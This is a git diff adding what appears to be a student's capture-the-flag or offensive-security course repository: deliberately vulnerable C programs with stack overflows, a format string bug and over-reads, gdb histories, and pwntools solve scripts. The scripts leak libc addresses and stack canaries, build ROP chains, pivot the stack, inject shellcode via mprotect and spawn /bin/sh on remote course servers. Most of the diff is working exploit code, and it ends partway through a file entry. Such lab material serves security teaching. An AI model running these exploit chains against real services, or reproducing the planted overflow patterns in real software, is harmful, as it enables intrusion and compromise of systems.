diff --git a/lab3_4_recap/01_aquabank_armory/.gdb_history b/lab3_4_recap/01_aquabank_armory/.gdb_history new file mode 100644 index 0000000..2f1dd0b --- /dev/null +++ b/lab3_4_recap/01_aquabank_armory/.gdb_history @@ -0,0 +1,6 @@ +disass win +disass main +disass vuln +r +vmmap +quit diff --git a/lab3_4_recap/01_aquabank_armory/aquabank-armory b/lab3_4_recap/01_aquabank_armory/aquabank-armory new file mode 100755 index 0000000..8e6a809 Binary files /dev/null and b/lab3_4_recap/01_aquabank_armory/aquabank-armory differ diff --git a/lab3_4_recap/01_aquabank_armory/main.c b/lab3_4_recap/01_aquabank_armory/main.c new file mode 100644 index 0000000..be5360e --- /dev/null +++ b/lab3_4_recap/01_aquabank_armory/main.c @@ -0,0 +1,28 @@ +#include +#include +#include + +static void setup(void) { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +__attribute__((naked, used)) void pop_rdi_ret(void) { __asm__("pop %rdi; ret"); } +__attribute__((naked, used)) void pop_rsi_ret(void) { __asm__("pop %rsi; ret"); } +__attribute__((naked, used)) void pop_rdx_ret(void) { __asm__("pop %rdx; ret"); } +__attribute__((naked, used)) void syscall_ret(void) { __asm__("syscall; ret"); } + +static void vuln(void) { + char buf[64]; + + puts("[armory] Storeroom open -- pick your weapons:"); + (void)read(STDIN_FILENO, buf, 512); + puts("[armory] Locking down."); +} + +int main(void) { + setup(); + vuln(); + return 0; +} diff --git a/lab3_4_recap/01_aquabank_armory/solve.py b/lab3_4_recap/01_aquabank_armory/solve.py new file mode 100644 index 0000000..b494b30 --- /dev/null +++ b/lab3_4_recap/01_aquabank_armory/solve.py @@ -0,0 +1,36 @@ +from pwn import * + +OFF = 64 +context.binary = elf = ELF("./aquabank-armory", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13540) +print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n")) +ret = 0x000000000040101A +syscall = 0x0000000000401324 +pop_rdi = 0x000000000040196E +pop_rsi = 0x0000000000401977 +pop_rdx = 0x0000000000401980 +pop_rax = 0x00000000004214EB +writable = 0x4AC000 +mov_qword_ptr_rdx_rax = 0x000000000040AB08 +shellstr = b"/bin/sh\x00" +payload = flat( + b"A" * OFF, + p64(ret), + p64(pop_rdx), + p64(writable), + p64(pop_rax), + shellstr, + p64(mov_qword_ptr_rdx_rax), + p64(pop_rax), + p64(59), + p64(pop_rdi), + p64(writable), + p64(pop_rsi), + p64(0), + p64(pop_rdx), + p64(0), + p64(syscall), +) +p.sendline(payload) +p.interactive() diff --git a/lab3_4_recap/02_aquabank_atm/.gdb_history b/lab3_4_recap/02_aquabank_atm/.gdb_history new file mode 100644 index 0000000..13280bf --- /dev/null +++ b/lab3_4_recap/02_aquabank_atm/.gdb_history @@ -0,0 +1,30 @@ +b withdrawal +b withdraw +r +got +vmmap +display/w ¬e +b withdraw +r +display/w ¬e +quit +display/w note +display/w ¬e +3 +r +mmap +vmap +vmmap +quit +b withdraw +r +vmmap +quit +vmmap +r +vmmap +b *withdraw +r +vmmap +vmmap libc +quit diff --git a/lab3_4_recap/02_aquabank_atm/aquabank-atm b/lab3_4_recap/02_aquabank_atm/aquabank-atm new file mode 100755 index 0000000..52fddfb Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/aquabank-atm differ diff --git a/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched b/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched new file mode 100755 index 0000000..ed7fdff Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched differ diff --git a/lab3_4_recap/02_aquabank_atm/find_libc.py b/lab3_4_recap/02_aquabank_atm/find_libc.py new file mode 100644 index 0000000..0d26574 --- /dev/null +++ b/lab3_4_recap/02_aquabank_atm/find_libc.py @@ -0,0 +1,18 @@ +from pwn import * + +context.binary = elf = ELF("./aquabank-atm_patched", checksec=False) +p = process(elf.path) +# p = remote("offsec.m0lecon.it", 13523) +print(p.recvuntil(b"> ")) +for i in range(1, 400): + p.sendline(b"1") + p.recvuntil(b"Type your customer note: ") + payload = f"%{i}$p" + p.sendline(payload.encode()) + p.recvuntil(b"> ") + p.sendline(b"2") + p.recvuntil(b"--- Your customer note ---\n") + addr = p.recvline() + if b"0x7f" in addr: + print(f"Address:{addr} at pos:{i}") + p.recvuntil(b"> ") diff --git a/lab3_4_recap/02_aquabank_atm/ld-2.39.so b/lab3_4_recap/02_aquabank_atm/ld-2.39.so new file mode 100755 index 0000000..64b6146 Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/ld-2.39.so differ diff --git a/lab3_4_recap/02_aquabank_atm/libc.so.6 b/lab3_4_recap/02_aquabank_atm/libc.so.6 new file mode 100644 index 0000000..36f801c Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/libc.so.6 differ diff --git a/lab3_4_recap/02_aquabank_atm/main.c b/lab3_4_recap/02_aquabank_atm/main.c new file mode 100644 index 0000000..84bc6ac --- /dev/null +++ b/lab3_4_recap/02_aquabank_atm/main.c @@ -0,0 +1,76 @@ +#include +#include +#include +#include + +#define NOTE_MAX 96 + +static char note[NOTE_MAX]; + +static void setup(void) { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +static void banner(void) { + puts("=== Welcome to AquaBank ATM, v4.0 ==="); + puts("Set a customer note, then withdraw at your convenience."); +} + +static void set_note(void) { + printf("Type your customer note: "); + fflush(stdout); + if (!fgets(note, sizeof(note), stdin)) return; + note[strcspn(note, "\n")] = 0; + puts("Saved."); +} + +static void print_note(void) { + puts("--- Your customer note ---"); + printf(note); + puts(""); + puts("--------------------------"); +} + +static void withdraw(void) { + char from[32]; + char amount[32]; + char memo[64]; + + printf("From account: "); fflush(stdout); fgets(from, sizeof(from), stdin); + printf("Amount: "); fflush(stdout); fgets(amount, sizeof(amount), stdin); + puts("Withdrawal memo (be brief):"); + + fgets(memo, 256, stdin); + + printf("Queued withdrawal from %samount %s\n", from, amount); +} + +static void menu(void) { + char line[16]; + while (1) { + puts(""); + puts("=== AquaBank ATM ==="); + puts("1) Set customer note"); + puts("2) Print customer note"); + puts("3) Withdraw"); + puts("4) Exit"); + printf("> "); fflush(stdout); + if (!fgets(line, sizeof(line), stdin)) break; + switch (atoi(line)) { + case 1: set_note(); break; + case 2: print_note(); break; + case 3: withdraw(); break; + case 4: puts("Bye"); return; + default: puts("?"); + } + } +} + +int main(void) { + setup(); + banner(); + menu(); + return 0; +} diff --git a/lab3_4_recap/02_aquabank_atm/solve.py b/lab3_4_recap/02_aquabank_atm/solve.py new file mode 100755 index 0000000..4378958 --- /dev/null +++ b/lab3_4_recap/02_aquabank_atm/solve.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python3 + +from pwn import * + +# exe = ELF("./aquabank-atm_patched") +exe = ELF("./aquabank-atm") +libc = ELF("./libc.so.6") +ld = ELF("./ld-2.39.so") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.GDB: + gdb.attach(r) + else: + r = remote("offsec.m0lecon.it", 13523) + + return r + + +def main(): + p = conn() + OFF = 128 # On withdrawal + p.recvuntil(b"> ") + p.sendline(b"1") + # payload = b"%114$p" (local offset) + # payload = b"%74$p" # (remote offset) + # payload = b"%112$p" + # payload = b"%33$p" + payload = b"%33$p" + p.sendline(payload) + p.recvuntil(b"> ") + p.sendline(b"2") + p.recvuntil(b"--- Your customer note ---\n") + addr = int(p.recvline().strip(), 16) + # libc.address = addr & ~0xFFFFF + libc.address = addr - libc.symbols["__libc_start_main"] - 0x8B + # libc.address = addr & ~0xFFF + print(f"Address: {hex(libc.address)}") + BINSH = next(libc.search(b"/bin/sh\x00")) + # Stage 2 write the binsh string at a fixed address (note array) + # binsh = b"/bin/sh" + # p.recvuntil(b"> ") + # p.sendline(b"1") + # p.sendline(binsh) + print(p.recvuntil(b"> ")) + + # Stage 3 Buffer overflow and system call + p.sendline(b"3") + print(p.recvuntil(b"From account: ")) + p.sendline(b"A") + print(p.recvuntil(b"Amount: ")) + p.sendline(b"10") + print(p.recvuntil(b"Withdrawal memo (be brief):\n")) + ret = 0x000000000040101A + ret_libc = 0x000000000002882F + pop_rdi = 0x000000000010F78B + pop_rsi = 0x0000000000110A7D + syscall = 0x00000000000288B5 + pop_rax = 0x00000000000DD237 + payload = flat( + b"A" * (OFF), + p64(ret), + # p64(ret_libc), + p64(libc.address + pop_rdi), + # p64(exe.symbols["note"]), + p64(BINSH), + # p64(ret_libc), + # p64(exe.symbols["main"]), + # p64(libc.symbols["puts"]), + p64(ret), + p64(libc.symbols["system"]), + # p64(exe.symbols["main"]), + # p64(libc.symbols["system"]), + ) + # p.interactive() + p.send(payload + b"\n") + # p.interactive() + # %114$p + # %130$p + + # good luck pwning :) + + p.interactive() + + +if __name__ == "__main__": + main() diff --git a/lab3_4_recap/02_aquabank_atm/solve.py.bak b/lab3_4_recap/02_aquabank_atm/solve.py.bak new file mode 100644 index 0000000..4856211 --- /dev/null +++ b/lab3_4_recap/02_aquabank_atm/solve.py.bak @@ -0,0 +1,55 @@ +from pwn import * + +OFF = 128 # On withdrawal +# %25$lx +context.binary = elf = ELF("./aquabank-atm", checksec=False) +libc = ELF("libc.so.6", checksec=False) +# libc = ELF("/usr/lib/libc.so.6", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13508) +PRINTF_GOT = elf.got["printf"] +# Uso printf per stamparmi il libc address +# Uso save note per salvarmi /bin/sh nel buffer +# Salvo indirizzo di libc e chiamo system con /bin/sh +p.recvuntil(b"> ") +p.sendline(b"1") +# payload = b"%114$p" (local offset) +payload = b"%74$p" # (remote offset) +p.sendline(payload) +p.recvuntilb(b"> ") +p.sendline(b"2") +p.recvuntil(b"--- Your customer note ---\n") +addr = int(p.recvline().strip(), 16) +libc.address = addr +print(f"Address: {hex(addr)}") +# Stage 2 write the binsh string at a fixed address (note array) +binsh = b"/bin/sh" +note_addr = 0x4040A0 +p.recvuntilb(b"> ") +p.sendline(b"1") +p.sendline(binsh) +print(p.recvuntilb(b"> ")) +# +# Stage 3 Buffer overflow and system call +p.sendline(b"3") +print(p.recvuntil(b"From account: ")) +p.sendline(b"A") +print(p.recvuntil(b"Amount: ")) +p.sendline(b"10") +print(p.recvuntil(b"Withdrawal memo (be brief):\n")) +ret = 0x000000000040101A +ret_libc = 0x000000000002882F +pop_rdi = 0x000000000010F78B +payload = flat( + b"A" * (OFF), + # p64(ret), + p64(libc.address + pop_rdi), + p64(note_addr), + p64( + libc.symbols["system"], + ), +) +p.sendline(payload) +p.interactive() +# %114$p +# %130$p diff --git a/lab3_4_recap/03_aquabank_vault/.gdb_history b/lab3_4_recap/03_aquabank_vault/.gdb_history new file mode 100644 index 0000000..e77b45e --- /dev/null +++ b/lab3_4_recap/03_aquabank_vault/.gdb_history @@ -0,0 +1,6 @@ +r +r +r +r +vmmap +quit diff --git a/lab3_4_recap/03_aquabank_vault/aquabank-vault b/lab3_4_recap/03_aquabank_vault/aquabank-vault new file mode 100755 index 0000000..4ba9bda Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/aquabank-vault differ diff --git a/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched b/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched new file mode 100755 index 0000000..7387878 Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched differ diff --git a/lab3_4_recap/03_aquabank_vault/ld-2.39.so b/lab3_4_recap/03_aquabank_vault/ld-2.39.so new file mode 100755 index 0000000..64b6146 Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/ld-2.39.so differ diff --git a/lab3_4_recap/03_aquabank_vault/libc.so.6 b/lab3_4_recap/03_aquabank_vault/libc.so.6 new file mode 100644 index 0000000..36f801c Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/libc.so.6 differ diff --git a/lab3_4_recap/03_aquabank_vault/main.c b/lab3_4_recap/03_aquabank_vault/main.c new file mode 100644 index 0000000..569144f --- /dev/null +++ b/lab3_4_recap/03_aquabank_vault/main.c @@ -0,0 +1,62 @@ +#include +#include +#include +#include + +static void setup(void) { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +static void banner(void) { + puts("=== AquaBank Safe Deposit Vault ==="); + puts("Insert your card to issue a receipt or open the vault."); +} + +static void print_receipt(void) { + char buf[64]; + + puts("Type the receipt header (up to 64 chars):"); + ssize_t n = read(STDIN_FILENO, buf, sizeof(buf)); + if (n <= 0) return; + + puts("--- RECEIPT ---"); + fwrite(buf, 1, 256, stdout); + puts(""); + puts("---------------"); +} + +static void open_vault(void) { + char combo[128]; + + puts("Enter your combination:"); + (void)read(STDIN_FILENO, combo, 512); + printf("Combination registered: %.32s ...\n", combo); +} + +static void menu(void) { + char line[16]; + while (1) { + puts(""); + puts("=== AquaBank Vault ==="); + puts("1) Print receipt"); + puts("2) Open vault"); + puts("3) Exit"); + printf("> "); fflush(stdout); + if (!fgets(line, sizeof(line), stdin)) break; + switch (atoi(line)) { + case 1: print_receipt(); break; + case 2: open_vault(); return; + case 3: puts("Bye"); return; + default: puts("?"); + } + } +} + +int main(void) { + setup(); + banner(); + menu(); + return 0; +} diff --git a/lab3_4_recap/03_aquabank_vault/solve.py b/lab3_4_recap/03_aquabank_vault/solve.py new file mode 100755 index 0000000..137a6a9 --- /dev/null +++ b/lab3_4_recap/03_aquabank_vault/solve.py @@ -0,0 +1,125 @@ +#!/usr/bin/env python3 + +from pwn import * + +exe = ELF("./aquabank-vault_patched") +libc = ELF("./libc.so.6") +ld = ELF("./ld-2.39.so") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.GDB: + gdb.attach(r) + else: + r = remote("offsec.m0lecon.it", 13533) + + return r + + +def main(): + p = conn() + print(p.recvuntil(b"> ")) + p.sendline(b"1") + print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n")) + + p.sendline(b"A" * 64) + # p.sendline(b"A" * 1) + print(p.recvline()) + # print(p.recvline()[64 + 8 : 64 + 16]) + leak = p.recvline() + print(leak[64:]) + canary = leak[64 + 8 : 64 + 16].strip() + # canary = canary[::-1] + # canary = int(canary, 16) + print(f"Canary:{canary} len: {len(canary)}") + p.recvuntil(b"> ") + p.sendline(b"2") + print(p.recvuntil(b"Enter your combination:\n")) + # p.interactive() + payload = flat( + # b"A" * 128, + b"A" * 136, + canary, + b"STOPHERE", + exe.symbols["print_receipt"], + exe.symbols["main"], + ) + p.send(payload) + p.recvline() + # print(p.recvline()) + # print(p.recvuntil(b"Enter your combination:\n")) + # print(p.recvuntil(b"> ")) + # p.sendline(b"1") + # print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n")) + pause() + p.sendline(b"A" * 64) + p.recvline() + p.recvline() + + first_leak = p.recvline()[64:].strip() + print(f"Leak: {first_leak} len: {len(first_leak)}") + leak = p.recvline().strip() + first_leak += leak + count = 0 + addr = 0 + for i in range(len(first_leak)): + if first_leak[i] == 0x7F: + addr_raw = first_leak[i : i - 6 : -1].strip() + addr = int.from_bytes(addr_raw, byteorder="big") + if count == 4: + print(f"Address: {hex(addr)}") + break + count = count + 1 + # FIFTH INDEX (5) + # for i in range(23): + # print(f"Address - puts:{hex(addr - libc.symbols['puts'])}") + # print(f"Address - read:{hex(addr - libc.symbols['read'])}") + # print(f"Address - fwrite:{hex(addr - libc.symbols['fwrite'])}") + print(f"Address - start_main:{hex(addr - libc.symbols['__libc_start_main'] + 54)}") + libc.address = addr - libc.symbols["__libc_start_main"] + 54 + print(p.recvuntil(b"> ")) + p.sendline(b"2") + print(p.recvuntil(b"Enter your combination:\n")) + pop_rdi = 0x000000000010F78B + ret_libc = 0x000000000002882F + ret = 0x000000000040101A + BINSH = next(libc.search(b"/bin/sh\x00")) + ropchain = flat( + b"A" * 136, + canary, + p64(ret), + p64(libc.address + pop_rdi), + BINSH, + p64(ret), + # p64(libc.symbols["puts"]), + p64(libc.symbols["system"]), + ) + p.sendline(ropchain) + p.interactive() + # print(f"Address - printf:{hex(addr - libc.symbols['printf'])}") + # print(f"Address - setvbuf:{hex(addr - libc.symbols['setvbuf'])}") + # addr = first_leak[i * 8 : (i * 8) + 9] + # addr = addr[::-1] + # print(f"Address: {addr}") + + # pause() + # p.sendline(b"A" * 1) + # leak = p.recvline() + # print(f"LEAK:{leak[64:]}") + # print(p.recvline()) + # print(p.recvline()) + # print(p.recvline()[64 + 8 : 64 + 16]) + # leak = p.recvline() + # print(leak[64:]) + # p.interactive() + # good luck pwning :) + + # p.interactive() + + +if __name__ == "__main__": + main() diff --git a/lab3_4_recap/04_aquabank_safe/.gdb_history b/lab3_4_recap/04_aquabank_safe/.gdb_history new file mode 100644 index 0000000..6d7b821 --- /dev/null +++ b/lab3_4_recap/04_aquabank_safe/.gdb_history @@ -0,0 +1,26 @@ +disass deposit +b *0x000000000000135f +r +b deposit +r +r +clear +clear 1 +quit +b deposit +r +disass deposit +b *0x000055555555535c +c +info registers +disass deposit +disass open_safe +r +b open_safe +r +disass open_safe +b *0x00005555555553f5 +c +disass open_safe +info registers +disass deposit diff --git a/lab3_4_recap/04_aquabank_safe/aquabank-safe b/lab3_4_recap/04_aquabank_safe/aquabank-safe new file mode 100755 index 0000000..070adf9 Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/aquabank-safe differ diff --git a/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched b/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched new file mode 100755 index 0000000..d2eded9 Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched differ diff --git a/lab3_4_recap/04_aquabank_safe/ld-2.39.so b/lab3_4_recap/04_aquabank_safe/ld-2.39.so new file mode 100755 index 0000000..64b6146 Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/ld-2.39.so differ diff --git a/lab3_4_recap/04_aquabank_safe/libc.so.6 b/lab3_4_recap/04_aquabank_safe/libc.so.6 new file mode 100644 index 0000000..36f801c Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/libc.so.6 differ diff --git a/lab3_4_recap/04_aquabank_safe/main.c b/lab3_4_recap/04_aquabank_safe/main.c new file mode 100644 index 0000000..76f832d --- /dev/null +++ b/lab3_4_recap/04_aquabank_safe/main.c @@ -0,0 +1,67 @@ +#include +#include +#include +#include + +static void setup(void) { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +static void banner(void) { + puts("=== AquaBank Premium Safe ==="); + puts("PIE-protected vault. No leaks. (Or are there?)"); +} + +char vault[0x4000]; + +static void deposit(void) { + int n; + printf("[deposit] Vault deposit size (bytes): "); + if (scanf("%d", &n) != 1) return; + int c; while ((c = getchar()) != '\n' && c != EOF) {} + if (n < 0 || n > (int)sizeof(vault)) { puts("bad size"); return; } + printf("[deposit] Send %d bytes:\n", n); + (void)read(STDIN_FILENO, vault, n); + puts("[deposit] Deposit registered."); +} + +static void diagnostics(void) { + printf("[diag] printf @ %p\n", (void*)printf); + printf("[diag] entry @ %p\n", (void*)&diagnostics); +} + +static void open_safe(void) { + char buf[8]; + puts("[safe] Enter the 24-byte combination:"); + (void)read(STDIN_FILENO, buf, 24); +} + +static void menu(void) { + char line[16]; + while (1) { + puts(""); + puts("=== AquaBank Premium Safe ==="); + puts("1) Diagnostics"); + puts("2) Vault deposit"); + puts("3) Open safe"); + puts("4) Exit"); + printf("> "); fflush(stdout); + if (!fgets(line, sizeof(line), stdin)) break; + switch (atoi(line)) { + case 1: diagnostics(); break; + case 2: deposit(); break; + case 3: open_safe(); return; + case 4: puts("Bye"); return; + default: puts("?"); + } + } +} + +int main(void) { + setup(); + banner(); + menu(); + return 0; +} diff --git a/lab3_4_recap/04_aquabank_safe/solve.py b/lab3_4_recap/04_aquabank_safe/solve.py new file mode 100755 index 0000000..ba88991 --- /dev/null +++ b/lab3_4_recap/04_aquabank_safe/solve.py @@ -0,0 +1,122 @@ +#!/usr/bin/env python3 + +from pwn import * + +exe = ELF("./aquabank-safe_patched") +libc = ELF("./libc.so.6") +ld = ELF("./ld-2.39.so") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.GDB: + gdb.attach(r) + else: + r = remote("offsec.m0lecon.it", 13502) + + return r + + +def main(): + p = conn() + # Stage 1 take the libc base address and PIE base address + print(p.recvuntil(b"> ")) + p.sendline(b"1") + printf = int(p.recvline().split(b"@")[1].strip(), 16) + diagnostics = int(p.recvline().split(b"@")[1].strip(), 16) + libc.address = printf - libc.symbols["printf"] + base_pie = diagnostics - exe.symbols["diagnostics"] + print(hex(libc.address)) + print(hex(base_pie)) + # + # Save ropchain in the buffer + print(p.recvuntil(b"> ")) + p.sendline(b"2") + print(p.recvuntil(b"[deposit] Vault deposit size (bytes): ")) + # p.interactive() + p.sendline(b"16000") + # p.send(b"\n") + print(p.recvline()) + + BINSH = next(libc.search(b"/bin/sh\x00")) + ret = base_pie + 0x000000000000101A + pop_rdi = libc.address + 0x000000000010F78B + pop_rsi = libc.address + 0x0000000000110A7D + pop_rax = libc.address + 0x00000000000DD237 + xchg_edx_eax = libc.address + 0x000000000011EA8A + ret_libc = libc.address + 0x000000000002882F + rop_chain = flat( + # p64(ret), + # b"A" * 16, + b"A" * 8, + # p64(0x0), + p64(ret_libc), + p64(pop_rax), + p64(0), + p64(pop_rdi), + BINSH, + p64(pop_rsi), + p64(0), + p64(xchg_edx_eax), + # p64(base_pie + exe.symbols["menu"]), + # b"A" * 128, + p64(ret_libc), + p64(libc.symbols["execve"]), + # p64(libc.symbols["puts"]), + ) + p.sendline(rop_chain) + # + # BOF and return to vault + print(p.recvuntil(b"> ")) + p.sendline(b"3") + print(p.recvline()) + # Move the stack point to vault where the ROP Chain is. + # pop_rsp = base_pie + 0x000000000003C068 + # leave -> mov rsp, rbp pop rbp ( so we set target - 8 bytes) + # leave = libc.address + 0x00000000000299D2 + leave = base_pie + 0x0000000000001385 + pop_rsp = libc.address + 0x000000000003C068 + print(f"Vault addr:{hex(base_pie + exe.symbols['vault'])}") + payload = flat( + b"A" * 8, + # p64(leave), + # p64(base_pie + exe.symbols["vault"]), + # p64(leave), + # p64(ret), + # p64(pop_rsp), + # b"B" * 8, + p64(base_pie + exe.symbols["vault"]), + # p64(base_pie + exe.symbols["vault"]), + p64(leave), + ) + print(f"Payload len:{len(payload)}") + context.terminal = ["alacritty", "-e", "sh", "-c"] + # gdb.attach(p) + # pause() + p.sendline(payload) + # p.send(b"\n") + + # We switch to the read function in deposit + """final_p = flat( + b"A" * 0x4000, + p64(ret), + p64(pop_rdi), + BINSH, + p64(ret), + p64( + libc.symbols["system"], + ), + )""" + # p.send(final_p) + # print(p.recvuntil(b"[safe] Enter the 24-byte combination:\n")) + # print(p.recvline()) + # p.interactive() + # good luck pwning :) + p.interactive() + + +if __name__ == "__main__": + main() diff --git a/ret2libc/01_neon_diner/.gdb_history b/ret2libc/01_neon_diner/.gdb_history new file mode 100644 index 0000000..a3e9e92 --- /dev/null +++ b/ret2libc/01_neon_diner/.gdb_history @@ -0,0 +1,2 @@ +r +quit diff --git a/rop/01_toolkit/.gdb_history b/rop/01_toolkit/.gdb_history new file mode 100644 index 0000000..cc6d42a --- /dev/null +++ b/rop/01_toolkit/.gdb_history @@ -0,0 +1,11 @@ +r +disass win +disass main +disass main +disass win +quit +disass win +disass main +disass wuln +disass vuln +quit diff --git a/rop/01_toolkit/solve.py b/rop/01_toolkit/solve.py new file mode 100644 index 0000000..059fc74 --- /dev/null +++ b/rop/01_toolkit/solve.py @@ -0,0 +1,31 @@ +from pwn import * + +OFFSET = 64 +context.binary = elf = ELF("./toolkit", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13554) + +var1 = 0x1111111111111111 +var2 = 0x2222222222222222 +var3 = 0x3333333333333333 + +pop_rdi = 0x00000000004011FF +pop_rdx = 0x0000000000401211 +pop_rsi = 0x0000000000401208 +ret = 0x000000000040101A +win = 0x000000000040121E +print(p.recvuntil(b"[toolkit] Input: ")) +payload = flat( + b"A" * OFFSET, + p64(ret), + p64(pop_rdi), + p64(var1), + p64(pop_rsi), + p64(var2), + p64(pop_rdx), + p64(var3), + p64(win), +) +p.send(payload) +p.send(b"\n") +p.interactive() diff --git a/rop/01_toolkit/toolkit b/rop/01_toolkit/toolkit new file mode 100755 index 0000000..aecc375 Binary files /dev/null and b/rop/01_toolkit/toolkit differ diff --git a/rop/02_forge/.gdb_history b/rop/02_forge/.gdb_history new file mode 100644 index 0000000..af272ba --- /dev/null +++ b/rop/02_forge/.gdb_history @@ -0,0 +1,7 @@ +disass vuln +disass win +disass vuln +disass main +disass shellcode +r +disass main diff --git a/rop/02_forge/forge b/rop/02_forge/forge new file mode 100755 index 0000000..66e0af8 Binary files /dev/null and b/rop/02_forge/forge differ diff --git a/rop/02_forge/solve.py b/rop/02_forge/solve.py new file mode 100644 index 0000000..ddadd06 --- /dev/null +++ b/rop/02_forge/solve.py @@ -0,0 +1,37 @@ +from pwn import * + +context.binary = elf = ELF("./forge", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13574) +OFF_INPUT = 64 +ret = 0x000000000040101A +pop_rdi = 0x00000000004011FB +pop_rsi = 0x0000000000401204 +pop_rdx = 0x000000000040120D +shellcode_addr = 0x0000000000404080 +MPROTECT_PLT = elf.plt["mprotect"] +PROT = 0x7 + +print(p.recvuntil(b"[forge] Send shellcode:\n")) +shellcode = flat(asm(shellcraft.sh())) +SHELLCODE_SIZE = 200 +p.send(shellcode) +# p.send(b"A") +# p.send(b"\n") +print(p.recvuntil(b"[forge] Input:\n")) +payload = flat( + b"A" * OFF_INPUT, + p64(ret), + p64(pop_rdi), + p64(shellcode_addr & 0xFFFFF000), # Must be page aligned + p64(pop_rsi), + 4096, + p64(pop_rdx), + p64(PROT), + # p64(ret), + p64(MPROTECT_PLT), + p64(shellcode_addr), +) +p.send(payload) +# p.send(b"\n") +p.interactive() diff --git a/rop/03_chain_reactor/.gdb_history b/rop/03_chain_reactor/.gdb_history new file mode 100644 index 0000000..7d8d849 --- /dev/null +++ b/rop/03_chain_reactor/.gdb_history @@ -0,0 +1,8 @@ +disass main +disass vuln +disass main +b *0x000000000040132a +r +c +disass win +quit diff --git a/rop/03_chain_reactor/chain_reactor b/rop/03_chain_reactor/chain_reactor new file mode 100755 index 0000000..db36235 Binary files /dev/null and b/rop/03_chain_reactor/chain_reactor differ diff --git a/rop/03_chain_reactor/solve.py b/rop/03_chain_reactor/solve.py new file mode 100644 index 0000000..58d3da7 --- /dev/null +++ b/rop/03_chain_reactor/solve.py @@ -0,0 +1,24 @@ +from pwn import * + +OFF = 64 +pop_rdi = 0x000000000040121F +pop_rsi = 0x0000000000401221 +ret = 0x000000000040101A +var1 = 0xC0FFEE +var2 = 0xBADC0DE +win = 0x0000000000401226 +context.binary = elf = ELF("./chain_reactor", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13510) +print(p.recvuntil(b"[chain-reactor] Enter activation codes: ")) +payload = flat( + b"A" * 64, + p64(ret), + p64(pop_rdi), + p64(var1), + p64(pop_rsi), + p64(var2), + p64(win), +) +p.sendline(payload) +p.interactive() diff --git a/rop/04_arsenal/.gdb_history b/rop/04_arsenal/.gdb_history new file mode 100644 index 0000000..edf57bb --- /dev/null +++ b/rop/04_arsenal/.gdb_history @@ -0,0 +1,8 @@ +quit +disass main +disass vuln +r +disass vuln +disass main +vmmap +quit diff --git a/rop/04_arsenal/arsenal b/rop/04_arsenal/arsenal new file mode 100755 index 0000000..9a97cc2 Binary files /dev/null and b/rop/04_arsenal/arsenal differ diff --git a/rop/04_arsenal/solve.py b/rop/04_arsenal/solve.py new file mode 100644 index 0000000..8385e20 --- /dev/null +++ b/rop/04_arsenal/solve.py @@ -0,0 +1,38 @@ +from pwn import * + +OFF = 64 +context.binary = elf = ELF("./arsenal", checksec=False) +shellstr = b"/bin/sh\x00" +ret = 0x000000000040101A +pop_rdi = 0x000000000040196E +pop_rsi = 0x0000000000401977 +pop_rdx = 0x0000000000401980 +pop_rax = 0x0000000000401989 # Assign 59 (execve) to rax +syscall = 0x0000000000401324 +WRITE_ADDR = 0x4AA000 +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13594) +print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n")) +mov_qword_ptr_rdx_rax = 0x000000000040AB18 # mov qword ptr [rdx], rax; ret +payload = flat( + b"A" * OFF, + p64(ret), + p64(pop_rdx), + p64(WRITE_ADDR), + p64(pop_rax), + shellstr, + p64(mov_qword_ptr_rdx_rax), # Write /bin/sh to a writable address in memory + p64(pop_rax), + p64(0x3B), # 59 is the execve syscall + p64(pop_rdi), + p64( + WRITE_ADDR + ), # Address where I wrote /bin/sh so in RDI there is a pointer (char*) + p64(pop_rsi), + p64(0), + p64(pop_rdx), + p64(0), + p64(syscall), +) +p.sendline(payload) +p.interactive() diff --git a/rop/04_arsenal/test b/rop/04_arsenal/test new file mode 100755 index 0000000..c53f454 Binary files /dev/null and b/rop/04_arsenal/test differ diff --git a/rop/04_arsenal/test.c b/rop/04_arsenal/test.c new file mode 100644 index 0000000..3b04bfb --- /dev/null +++ b/rop/04_arsenal/test.c @@ -0,0 +1,6 @@ +#include +#include +int main(){ + execve("/bin/sh",0,0); + return 0; +} diff --git a/rop/05_padlock/.gdb_history 